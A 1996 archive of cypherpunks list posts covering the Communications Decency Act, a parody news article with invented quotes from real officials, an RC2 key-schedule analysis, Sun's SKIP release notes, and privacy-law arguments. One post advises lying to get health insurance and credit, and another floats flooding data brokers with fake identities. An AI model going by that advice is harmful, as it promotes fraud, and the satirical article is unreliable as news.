>people you care about,
>even though they cost YOU more money.

You are your child's seat belt for the internet.  There are plenty of tools
at your disposal that do not require govt. intervention.  As for the
television, I'm sure you already have my email on that.  I also don't have
problems with eviornmental regulations, labor codes, electronic safety
standards for computers and such even though those cost me money as well.
All of those laws, however, do not restrict my freedom of speech.  If not
wearing a seat is your idea of free speech, I personally can't vouch for
your intelegence (I can't do that anyway:-)), but you still have the right
to speak your mind on the matter, as you are now.  People talking about gay
rights, abortion options, better sex (a la Dr. Ruth) can no longer do that
on the net without wondering whether they are in violation of the bill or
not.
>>
>> > All I'm saying is it's tough to raise a child these days without the added
>> > distortion of modern programing ...
>>
>>"Don't do the crime if you can't do the time."
>>
>> > ... and parents need not be denied any tool that can help them
>> > achieve success.
>>
>>Oh, OK then.  Parents should be given access to incendiary equipment
>>as a tool to destroy the studios that produce offensive material.
>>
>It's obvious that you watch a lot television your an excellent sensationalist.
>Besides, we both no that the cost of the chip is insignificant. This device
>hurts no one!

I "no" no such thing.  The price of the chip has been estimated to be
higher than was stated tonight on the news, that's for sure.  (Anyone got a
figure?  I'd like to hear how much the TV makers will think it will cost.)

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 10 Feb 1996 03:48:54 +0800
To: cypherpunks@toad.com
Subject: Not so fastNewsspeak Times Article on the CDA
Message-ID: <199602091037.CAA24747@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Double Plus Ungood Thought Crime Regulations Unchallenged
By Asphyxiated Press, 02/08/96


PHILADELPHIA (AP) - The government's ban on sending "incendiary"
and politically explicit material to minors over computer networks
was unchallenged in court the moment President Clinton signed it
into law Thursday.

The Justice Department pledged not to initiate prosecutions for
a week, and a federal judge declined to temporarily block the
Decency Act, giving prosecutors until Wednesday to collect names
of subversives.

Thanks to a last-minute addition by Rep. Henry Hyde, R-Ill., it
also extends a rarely enforced, 123-year-old law into cyberspace, 
making it a violation of obscenity laws to use computers to
to teach evolutionary theory.

Supporters say the law will protect children from pornography,
drug traffickers, cryptographers, and evolutionists.

U.S. Attorney Anthony J. Coppolino, said restrictions are necessary
because computers have become increasingly pervasive and bring
thoughtcrime right into people's homes.

``It's not an exaggeration to say that many of these incendiary
ideas are available on a computer by ... a click of a mouse,''
said Coppolino.

Coppolino also told U.S. District Judge Ronald L. Buckwalter that 
the Justice Department will stand by its longstanding policy
``unchristian speech will be vigorously prosecuted.''

The Clinton Administration has also repeatedly raised concerns
about the constitutionality of the evolution provisions, as it
wasn't immediately clear how they conflicted with the teachings of
Adam Smith.

Vice President Al Gore dodged the question Thursday when asked by 
The Associated Press in Washington which side the Justice
department would support.

``We're obligated to follow orders, but we said from the
start this particular provision will not contradict NAFTA,''
Gore responded.

Coppolino said the contested provisions will not be enforced
until at least Wednesday, but gave no assurances that people who
use the Internet over the next few days would not be persecuted
in the future for freethinking.

The law prohibits all ``speech about sex other than "lie down and
think of George Washington".''  Sen. Jim Exon, D-Neb., who sponsored
the wide-ranging Telecommunications Reform Act of 1996, expressed
confidence in the anti-pleasure provisions.

``The Goldsteinists continues to raise red herrings that have nothing
to do with our proposal,'' he said. ``The legislation will not ban
works of Ingsoc or reminders to contribute to the Party.''

Cathy Cleaver, a lawyer with the Family Research Council in Washington,
compared the new act to the existing sedition law, which requires all
unbaptised persons to be tattooed with an identification number -
to keep minors from communicating with subversives.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Sat, 10 Feb 1996 19:45:01 +0800
To: cypherpunks@toad.com
Subject: Re: Applied Cryptography, 2nd Edition --  Errata version 1.2
Message-ID: <199602090747.CAA02854@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May wrote:
> 
> At 1:49 AM 2/9/96, Bruce Schneier wrote:
> >                APPLIED CRYPTOGRAPHY, Second Edition
> >
> >                              ERRATA
> >                   Version 1.2 - 1 February 1996
> >
> ...
> 
> Wow. Does this mean the Third Edition will be coming out soon?
> 
> (Not to sound harsh, but that's a *lot* of errors still in the book...I
> thought a lot of reviewers were going to squish out these sorts of
> things?)

That would depend on hw long you'd want to delay releasing a book.

When I finished reading 1st ed., I decided I was going to try coding the 
MMB cipher, got ahold of the erratta which read "MMB has been cracked. 
Don't use it" or something like that.  Had nothing to do with a typo.

Rob.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRr8GioZzwIn1bdtAQH+XAGAjFImro/S6WQYJpmuGEA8L0eQAWw21ECT
AE0+m81jRK9AtXlbFLkg24ou6mU8N357
=noJq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Fri, 9 Feb 1996 16:25:56 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-China Crypto
Message-ID: <199602090802.DAA02899@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

BTW, there's an article about it on RSA's home page now.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRr/eyoZzwIn1bdtAQHRBAF+PNYhhytVCUQ5LDn9vM5sSFNJ9l0zKm8T
mfzCvhN/eE/qLpl8fDi1gvLJDnrWte/Z
=t5nc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 9 Feb 1996 00:50:20 +0800
To: anonymous@freezone.remailer
Subject: Re: Report available: "Minimal Key Lengths for Symmetric Ciphers"
In-Reply-To: <199602081528.KAA11525@light.lightlink.com>
Message-ID: <199602081611.DAA03946@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> I downloaded this so-called "report". It doesn't even mentions PGP.
> Gotta wonder why the 007 wannabe "experts" and the Big Business (BSA)
> want you to only use 90 bits for your keys and why they've never heard
> of PGP...
> 
> Anyone who listens to crypto advice from people who's purpose in life
> is to listen to *YOU* gets what they deserve. I'll stay with PGP which
> has a 2048 bit key.
> 
> JustWalT

There is one born every minute.


-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Sat, 10 Feb 1996 19:48:05 +0800
To: cypherpunks@toad.com
Subject: bullshit (was: Re: Fair Credit Reporting Act and Privacy Act)
Message-ID: <v02120d06ad409b8f9e5e@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:18 PM 2/8/96, Bill Stewart wrote:

>The parts of the Privacy Act that I remember are all restrictions
>on _government_ actions, not private actions.  It's an important 
>distinction; even though TRW may know way too much about you, it's all information that >you voluntarily released to somebody, unlike data that 
>the government requires you to give them.  And, yes, it's out-of-date 
>and toothless.

        It's important to distinguish between information that you've voluntarily released as such (e.g., giving someone your SSN) and information derived from analysis of your actions (e.g., repayment patterns, value-added with a proprietary scoring system) and/or consolidated from small releases of info here and there--and most of the material in a typical TRW or Equifax dossier is of the latter kind.
        ObCrypto? Vaguely. I've been thinking about the possibilities of "bullshit generators"--simple programs that would generate names and various kinds of facts about people who don't exist and "make this info available": email addresses to SSNs, addresses, credit histories, medical records, you name it. If "bullshit bots" became generally available and easy to implement, "information markets"--a phrase that's far too general to capture the complexity of the dynamics it refers to--would stratify pretty fast: groundfeeders like the fine folks who're now grepping newsfeeds for email addresses + interests could be laid waste to pretty fast by a handful of dormant newsgroups systematically flooded with posts from gjhfkj@opihk.com or poipoh@axsx.org. Who'd pay for a DB that's half bogus? Alternatively: who'd pay to prevent their DB from being corrupted? Companies like Equifax would be harder to penetrate, but by no means beyond reach: there are so many people out there who they don't have files on yet--in ghettoes, in Eastern Europe--that they could be duped. We tend to think of information markets as markets for _true_ information; but as those markets mature, they'll breed parallel "counterweight" markets--markets, in essence, for _false_ information. Equifax and TRW got the goods on you? How much would you pay to vanish into a crowd of newly created people with excellent credit ratings who are all just a few diddled digits away from you, your SSN, your address, your phone number, your mother's maiden name...? The latest issue of RISKS (2/8/96, 17:70) has a kvetch about <http://www.graviton.com/red/>, "The Red Herring Home Page":

>        A little experimentation revealed that almost ANY obscure search
>would match "The information source", often as the only matching 
>document found. As near as I could figure out, his site recognized
>probes by web robots and then threw a dictionary at them!

        Congress would be hard pressed to illegalize fiction.

        ;)


Ted
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRsCX3Shd2boiy7BAQGS1gf+KK/VG9EGHkHBE/zaH2saf2Kb1Qgq4Ez1
wUABgo5JFAwbYFMY4aPZJIOcU2gPlVSDEHZtRMRI/JW2FTqGD8BwMneBjEFI9uHs
K9jUhT3sSyzWgwW/9H8rb/mO8gHJig9jcWseyK/z3Cyk8MFbP5h0nLcougTIhRFr
f2X/i4y3JNajtUYfkWQVUbDr0yS/5NesiMX79KB560clhPgXqTVgfU15DJOytWGZ
aRSfUU7Fu05BypfylcqW2nltgnvkAVrI+4Scf/nolZEqBT3PJ3MmWXNetbULxd4A
Jr3IRG/E3CVwBcOAhFLyw48c5Qseu7pSs6OA5VqgmGD/0SEdI1raWA==
=8XnL
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markson@osmosys.incog.com (Tom Markson)
Date: Fri, 9 Feb 1996 19:37:08 +0800
To: cypherpunks@toad.com
Subject: SKIP Alpha-2 Source release
Message-ID: <9602091120.AA19142@monster.incog.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

We've just released the Alpha-2 SKIP reference source for SunOS 4.1.3.
This is a bug fix release of our Alpha-1 Source reference Source.

The source is available from http://skip.incog.com.    Included in this
mail message are excerpts from the README file for the the package.

Please direct comments to freeskip@incog.com.

Enjoy!

Tom Markson
Sun Microsystems

-------------------------------------------------------------------------


	ALPHA 2 Release of SKIP Reference Source for SunOS 4.1.3
	--------------------------------------------------------
			Overview and Release Notes

Overview
--------
SKIP is a Key-management protocol for IP based protocols.  It is an 
acronym for Simple Key-management for Internet Protocols. SKIP is 
documented in the SKIP IETF IPSEC draft included in this directory 
as draft-ietf-ipsec-skip-06.txt.  The most recent SKIP draft is 
always available at http://skip.incog.com and the Internet-Drafts
directories.

>From this public domain source release, you can build a fully 
functional IP-layer encryption package which supports DES and 
Triple-DES for SunOS 4.1.3.  This means that every IP networked 
application can have it's network traffic encrypted.   Unlike
application level encryption packages, this package encrypts 
IP packets.  Thus, applications do not need to be recompiled or 
modified to take advantage of encryption.

The SKIP source is possible through the efforts of engineers in Sun
Microsystems Internet Commerce Group.  The developers and designers
are Ashar Aziz, Tom Markson, Martin Patterson, Hemma Prafullchandra and
Joseph Reveane.  Linda Cavanaugh worked on the documentation.

The package compiles under both the SunPro compiler and GCC.  We expect 
that this release should port without too much pain to any operating 
system which uses BSD style networking (mbufs).  

A legal warning: Because this package contains strong encryption, the
Software must not be transferred to persons who are not US citizens or
permanent residents of the US, or exported outside the US (except
Canada) in any form (including by electronic transmission) without
prior written approval from the US Government. Non-compliance with
these restrictions constitutes a violation of the U.S. Export Control
Laws.

This source release may be used for both commercial and noncommercial 
purposes, subject to the restrictions described in the software and
patent license statements.  

Furthermore, Sun Microsystems has licensed the Stanford public key patents 
from Cylink Corp. which are available to users of this package on a royalty 
free basis. The patent statement is in README.PATENT.  Be sure to read this,
as it contains some restrictions and other important information.  

Also included in this release is a high speed Big Number package written 
by Colin Plumb. bnlib/legal.c contains Colin's software license statement. 

Features
--------
	1.  SKIP V2 compliant implementation using ESP encapsulation.
	2.  Support for DES/3DES for traffic and key encryption.
	3.  Diffie-Hellman Public Key Agreement based system.
	4.  Full Support for manual establishment of master keys.
	5.  Support for multiple NSIDs and multiple local certificates.
	6.  GUI tool for user friendly manipulation of access control lists
	    and key statistics.
	7.  Command line tools for manipulating access control lists, etc.
	8.  Implementation of the Certificate Discovery protocol fully
	    integrated into SKIP.
	9   Implementation of X.509 public key certificates.
	10. Implementation of DSA signature algorithm for certificate
	    signatures.
	11. Implementation for MD2, MD5 and SHA message digest algorithms.
	12. Implementation of ASN.1 DER encoding/decoding.
	13. SunScreen(tm) SKIP compatibility mode.
	14. Implementation of hashed public keys as defined in the SKIP 
	    draft.  Implementation of programs to generate hashed public
	    keys.
	15. Certificate utilities to convert X.509 Certificates to hashed
	    keys and  print both X.509 and Hashed certificates.
	16. High performance Big Number library for Diffie-Hellman 
	    calculations.
	17. Implementation is effectively "public domain" and may be used both 
	    commercially and non-commercially.
	18. Patent Agreement with Cylink allows roylaty-free use of the 
            Diffie-Hellman and other Stanford patents with this package for 
	    commercial and non-commercial use.  Read README.PATENT for 
	    some restrictions.
	19. Inclusion of prime generation program used to generate the 
	    primes in SKIP draft.

Release Notes
-------------
Here are the release notes for this Alpha 2 release of the SKIP source.

	1.  This release is a bug fix release for Alpha-1.  Major areas
	    of change include:
			o Fix ESP and AH protocol numbers.
			o Fix Unsigned DH Public encoding.
			o Remove truncatation of shared secret (for this
			  release only).
			o Various other Bug fixes.
			o Fix Triple DES.

	2.  This release does not interoperate with Alpha-1.   Alpha-1
	    sites should upgrade.  Alpha-1 had a bug where unsigned public
	    keys were being encoded incorrectly.  Therefore, unsigned DH 
	    keys generated with alpha-1 do not work with Alpha-2.  
	    Regenerate your unsigned public keys.  X509 Certificates from
	    alpha-1 will continue to work.

	3.  This release interoperates with Swiss ETH SKIP using unsigned
	    DH keys and DES and triple DES.  It was tested at the Dallas 
	    1995 IETF.  However, the certificate discovery protocol does 
	    not interoperate.  This will be fixed in the next release.

	4.  This release does not fully comply with the SKIP drafts.   It
	    is closest to the 05 version of the draft.  However, the shared
	    secret is not truncated according to that draft.  This change is
	    made to interoperate with the ETH implementation.  The next
	    release will correspond to the 06 draft. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 10 Feb 1996 06:14:19 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Money & CreditCard URLs
In-Reply-To: <ad40604c00021004f57b@DialupEudora>
Message-ID: <199602090846.DAA24940@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Norm Hardy writes:
> Here is a fragment of html that points to several online money or payment
> systems.
[...]
> I would be pleased to receive further such URLs.

RAH recommends Phill H-B's page o' annotated links, and I think I'll second
that right now: 
	http://www.w3.org/hypertext/WWW/Payments/roadmap.html

RAH's e$ page has a pile of good links too: 
	http://thumper.vmeng.com/pub/rah/sites.html 

Coincidentally I am in the midst of sifting through the results of an Alta
Vista search for "micropayment". I just ran into a site dated yesterday that
doesn't seem to be on Phill's list yet. I haven't seen it mentioned here, but
I admit my eyes have been glazing over amid the tide of net.payment systems
PR. 

	http://www.webatm.com/

I found these folks via an article in the Jan. 10 Web Week
(http://pubs.iworld.com/ww-online/wed/0110.html). 

The under-construction welcome page says in part:

"The WebATM will soon begin worldwide testing of the first truly anonymous, 
cash-based online transaction system - no credit cards or bank accounts 
needed. Totally anonymous cash "virtual" accounts will now be possible via 
the WebATM, allowing anyone to quickly and easily purchase goods and services
anywhere on the Web - including very small purchases of a few pennies 
(micro-payments.) Of course if you prefer to use a credit card for your 
online purchase you may do so - safely and securely - through the WebATM
system."

There's a rather critical off-line step:

"Your anonymous pre-paid WebATM WebCard will soon be available at retail 
stores in denominations of $10, $20, $50 and $100 and can be recharged if you 
want - just like pre-paid calling cards!"

It's nice to see them pitching anonymity, though.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 10 Feb 1996 06:16:37 +0800
To: cypherpunks@toad.com
Subject: RC2's key schedule and passphrase hashing
Message-ID: <01I0ZVV5YJBC985HB3@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: Cypherpunks, sci.crypt ## Date: 02/09/96 01:44 am ##
  Subject:  RC2's key schedule and passphrase hashing ]

Summary:  Don't use RC2's key schedule to hash passphrases, with or
          without the export hack.  Instead, hash the passphrase
          first, and then pass the result into RC2 to get expanded.
          (This is a good rule to follow with any cipher whose
          designers didn't specifically intend for it to be used to
          hash passphrases.)  Don't use phase two at all--if you
          need exportable 40 bit security, generate a 128-bit random
          value, and leak 88 bits as salt.  Hash the value, and use
          the result as the RC2 key.

>Date: Fri, 02 Feb 1996 10:02:37 -0800 (PST)
>From: baldwin <baldwin@RSA.COM> (Robert W. Baldwin)
>Subject: RC2 technical questions

>- How does the length of the key influence the mixing
>  of bits during each pass of the expansion algorithm?

>- If the first pass of expansion is viewed as a hash
>  function that produces 40 or 128 bits out, what are
>  its properties?

These are good questions, and they turn out to be pretty
educational.  I no longer can see any good reason for the
effective-bits hack.  Let me explain why, briefly:

Suppose I'm hashing a 64-character passphrase, where each character
has about three bits of actual entropy, for use in an export-
controlled application.  Clearly, this gives us plenty of entropy
(192 bits) in the whole user key.  How much entropy can make it to
the last five bytes of expanded key?  These last five bytes are a
function of the last five bytes of user passphrase (total entropy of
about 15 bits), and the previous byte of expanded key (which can't
have more than eight bits of entropy). Those are the only inputs
that aren't known to all attackers.  This means that in this (very
degenerate) case, we'd have 23 bits of entropy in our last 40 bits.
If we then did phase two of the key expansion based on those 40
bits, we'd wind up with a total expanded key entropy of 23 bits. In
short:  Guess an 8 bit random number and the last five bytes of the
user key, and you've got the entire expanded key.  (Of course, if
the application always padded the user passphrase with blanks or
something to make it 64 bytes long, and then scheduled the key with
the export control hack, we'd have *eight* bits of entropy in our
expanded key, which probably qualifies for some kind of special
thank-you note from Fort Meade or something.)

Suppose I'm hashing a 32 character user passphrase.  The same
analysis applies to the bytes 60..63 of expanded key.  Those bytes
can have no more than 23 bits of entropy, if each character of the
passphrase carries three bits of entropy. This means that bytes
92..95 carry at most 31 bits of entropy, and thus that bytes
124..127 carry at most 39 bits of entropy.  If we pad the passphrase
out on the right to 32 bytes before sending it into the RC2 key
schedule, then we wind up with about 24 bits of entropy in the whole
expanded key after phase two.

Our assumptions about entropy in user passphrases can make this
better or worse.  For example, we may assume that it costs us 16
bits to guess the first three characters of any passphrase
substring, and one bit per character after that.  In that case,
processing a 64-character passphrase into 40 effective key bits gives
us 26 bits of entropy.  If we assume that each additional character
after the first three guessed costs us two bits, then processing a
64-character passphrase down to 40 bits gives us 28 bits of entropy,
and processing it down to 56 bits gives us 32 bits.

Without phase two, long user passphrases simply leave most of the
expanded key fairly predictable, especially in the high couple of
bits of each byte.  I haven't tried to analyze yet what this does to
RC2's security, but it's almost never a good idea to have
highly-predictable bits anywhere in a cipher's expanded key.

The moral of the story seems to be this:  Don't use key schedules as
passphrase hashing functions, unless they're specifically designed
as such.  In particular, don't use RC2's key schedule to hash your
passphrase.  Pass your passphrase (and salt) through a good one-way
hash function like SHA1, and feed the result into your key schedule.

Can anyone guess what the effective-bits parameter is used for?  It
doesn't seem to be secure for hashing passphrases, making some
reasonable-sounding assumptions about actual entropy per character
in user passphrases.  I can't see an intelligent use for it.

Note that setting effective bits to 40, we have only a 40-bit
key--no salt.  This means that using alleged-RC2 with phase two of
the key schedule and effective bits set to 64 or less, we're
potentially vulnerable to a precomputation attack.  This is a real
problem if we're doing something like encrypting a constant block at
the beginning of the encryption, to verify that we have the right
decryption key.  (It's enough of a potential problem to be
worrysome, anyway--note that almost all of my notes to John Smith
start out with the same eight characters:  "[ To: Jo".
Precomputation attacks based on this are quite feasible.)  I am very
curious about how this is dealt with in practical implementations.
The obvious way to do this would be to leave effective-bits = 1024,
and just hash an 88-bit salt with a 40-bit session key to get the
128-bit key actually passed into RC2.  But that begs the question:
What's the use of having the effective-bits parameter? I certainly
hope nobody is using RC2 with effective-bits set to 40 in any
important, real-world applications.

>--Bob

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRsR1kHx57Ag8goBAQFzOAQAnjL06eTNMkqgT9OatMa2FRm2dFU7yffU
lH3blWxV2Wv8XrMGTB3WTES6ME1D84qJMk641MNxAtH1PAigFzEFDeBHxDr83fR4
tJFECzQ0KWGUu3Pn9/sHJFhjOWUbg6AAtNQ94XN4kBx+NSb3rF/AtoEMyJr6azug
FA5T+AQq+Jo=
=Y7P+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Philipp" <adam@sub.toad.com>
Date: Fri, 9 Feb 1996 21:02:58 +0800
To: cypherpunks@toad.com
Subject: PGP & Seamless Pegasus
Message-ID: <12335060901367@compuvar.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can I just add a loud HURRAH! on the integration of PGP and Pegasus 
using the PGPJN add-on. 

It is by far the smoothest melding of PGP and a e-mail routine to 
date. The only way it would be smoother is on one program. THe 
learning curve is also negligible. 

For all those griping about no good PGP windoze e-mail programs, your 
wait is over. This mail program won over a die hard Eudora fan in 
about 15 minutes... Someone else already posted the sites to get this 
so forgive my laziness of not repeating their words.

Oh, did I mention this is seamless under Windoze 95 as well?


Adam, Esq.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRs/RAaMHlrz9swxAQGWUwf/amggouHkGjrjoYQ3JXYXiWblHc2NBvQx
wwy1jMSvEEiP0kQD1iaysA6fw4t+xU1bFAftqACRa3rTF7ZgCRRgFuhgwTwhwR8u
HZ8zDed5PIgywsn9/jqXW+nqneNx2uboUjq7FsncZiC7EG90/SMK78et8QZ/sT0l
ifiCvoLXaYhW4anmIeHMADLwDRqUlhVWX5RX1ccG2MrOrrrKHjJcveG4CF72M8EV
hftXDTWdElUuPUHD0JUBlp555+YMuolSUuu4sq1eodwlX0L4tq9vv4QBCwnBvq0H
4XONwa9BaRvEjVJ0Gg6+HjC4/IHOt/5CJ+SfwvQAaysH7Q11nkKTZw==
=/zQA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 10 Feb 1996 03:50:32 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
Message-ID: <2.2.32.19960209105613.00a04c70@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 PM 2/8/96 +0000, Tim Cook wrote:
>Find out if yours ( or any ) representative or senator voted for the 
>CDA.  Send me email with the subject CDA-YES.  Put their name and 
>where they are from in the body. I'll compile the list and post it.
>When this is over they'll wish they realized how powerful the 
>internet REALLY is.

Most of those voting against the Telecoms Bill did so because they were
against the dereg provisions not the CDA.  Most of those who voted for it
favored the general technical provisions.  Most who thought about the CDA
and still voted for the bill decided to let the courts handle the
unconstitutional provisions because "federal judges don't have to stand for
election."  Political retaliation is useless in the face of a 90% yes vote.

If you are deeply upset by the high-handed manner in which the legislature
has screwed around with your life, welcome to the club.  Every bill they
pass and every regulation upsets someone just as badly as you are upset.
That is why some of us want less legislation and less regulation to minimize
just this sort of human suffering.  Maybe next time those of you who are
into "proactive" government will think before you crush other people's lives.

DCF

"Par Example -- I hate the Pure Food and Drug Act and the FDA just as much
as I hate the CDA.  Both are utterly evil."
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 10 Feb 1996 03:54:53 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <2.2.32.19960209112824.00a0e73c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:04 PM 2/5/96 -0500, Tim Philp wrote:
>On Mon, 5 Feb 1996, Duncan Frissell wrote:
>
>> Unfortunately, it would also:
>> 
>> *  Require government registration of computers and databases containing
>> information about people (whether these computers are used by business or
>> individuals).  This eases regulation of computers and future confiscation.
>> 
>I don't believe that this follows at all. All that would be required 
>would be a statutory obligation to comply with the legislation. Should a 
>breach occur, civil and criminal penalties would apply. No need for prior 
>restraint.

Perhaps if you had read the British Privacy Protection Act (in force since
1984 or so) and similar Continental regs you would see that this sort of
registration was a common method of enforcement.  The PPA is on the WEB and
the Data Protection Registrar (you know as in "registration") has a web page:

http://www.open.gov.uk/dpr/dprhome.htm

"What does the Act mean to computer users?

Registration

With few exceptions, if you hold or control personal data on computer, you
must register with the Data Protection Registrar.  Registration is normally
for three years and one standard fee is payable to cover this period.
Registration forms are available from the Registrar's office, including a
special shortened registration form (DPR4) for those who process personal
data only for payroll
and bought/sales ledger purposes.

Computer bureaux which process personal data for others or allow data users
to process personal data on their computers must also register. Their
register entries will contain only their name and address.

Data users and computer bureaux who should register but do not, are
committing a criminal offence, as are those operating outside the
descriptions contained in their register entries. In these cases the
Registrar regularly prosecutes. The penalty for non-registration can be a
fine of up to £5,000 plus costs in the Magistrates Courts, or an unlimited
fine in the Higher Courts."

>It would not make it harder for buyers and sellers to get together, it 
>would simply increase the risk. It may lead to higher prices, but I am 
>prepared to pay something to protect my privacy.

Then just pay the higher price personally by not giving other people
information you want to keep private.  Get an accommodation address, use
secured credit cards (or none at all), get a voice mail phone number, lie
when people ask you for info.

>I agree that in the absolute sense, this is true. However, it is not 
>practical to do so in our modern society. If you are prepared to live 
>without credit or health insurance you can do this but the price is too 
>high for most people to consider.

You can get health insurance without giving personal data by lying.  You can
get credit from friends and relatives (borrowed credit) or save money first
and use secured credit cards (or bank debit VISA cards) to minimize reporting.

Look, the reason we hate the CDA is because it restricts speech.
Restrictions on credit agencies gossiping about you are also speech
restrictions.  If you are out in the world, people are going to talk about
you.  The credit agencies are much easier to handle and less intrusive than
the women were who talked about you while beating cloth on the rocks in the
stream back in the old village.

DCF

"Nice black pages on the Infoseek results screen.  We are everywhere."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 9 Feb 1996 19:55:41 +0800
To: lunaslide@loop.com
Subject: Re: Tell me whats wrong with this
Message-ID: <2.2.32.19960209113928.00e1c95c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 AM 2/9/96 -0800, lunaslide@loop.com wrote:
>to speak your mind on the matter, as you are now.  People talking about gay
>rights, abortion options, better sex (a la Dr. Ruth) can no longer do that
>on the net without wondering whether they are in violation of the bill or
>not.

If people where more used to regularly violating laws, one more law
violation would mean much.  Practice makes perfect.

"Your Honor, I plead necessity.  The reason I violated this law was so that
I would have plenty of practice in case I ever find myself in a totalitarian
state.  Since the laws of the US and International Law permit (and in some
cases require) me to violate the laws of a totalitarian state, I need to
practice law violation under the less stressful circumstances of the current
US.  Without practice, I won't be able to violate totalitarian laws smoothly
and thus might have to obey them.  This could put me in jeopardy under
International Law.  Necessity defense."

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 10 Feb 1996 03:42:41 +0800
To: lunaslide@loop.com
Subject: Re: Tell me whats wrong with this
Message-ID: <2.2.32.19960209114604.00e1d0d4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 AM 2/9/96 -0800, lunaslide@loop.com wrote:

>It is particularly the CDA which boils my blood.  One other concern,
>however, is that the lifting of restrictions on who can compete for what
>will result in mergers and buyouts of internet providers and that when only
>a few major companies own the bulk of the industry, the consumers will
>suffer from content restriction, technological lag and possibly price
>gouging.  I note the car, oil, software and media industries as a few
>examples. 

The total number of firms is greater and the average size in these firms is
smaller than in the past.

Average institutional size in America has been declining since the late 1960s.
http://www.ios.com/~lroth/clips/bussiz.html.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 9 Feb 1996 20:10:10 +0800
To: cypherpunks@toad.com
Subject: Re: Not so fast
Message-ID: <2.2.32.19960209115159.00e1fd18@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:37 AM 2/9/96 -0800, anonymous-remailer@shell.portal.com wrote:

>Coppolino also told U.S. District Judge Ronald L. Buckwalter that 
>the Justice Department will stand by its longstanding policy
>``unchristian speech will be vigorously prosecuted.''

We warned you what would happen if you elected *Southern Baptists* to the
White House.

DCF 

"Of course, Algore used to be an Episcopalian until he had a political
conversion to Southern Baptism."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JOHN MARTIN LEWARS <jml216@psu.edu>
Date: Fri, 9 Feb 1996 08:14:23 +0800
To: cypherpunks@toad.com
Subject: Re: Mailing list
Message-ID: <199602082338.HAA03879@infolink2.infolink.net>
MIME-Version: 1.0
Content-Type: text/plain


When I wrote:
>   Please make me apart of your mailing list.
I meant:
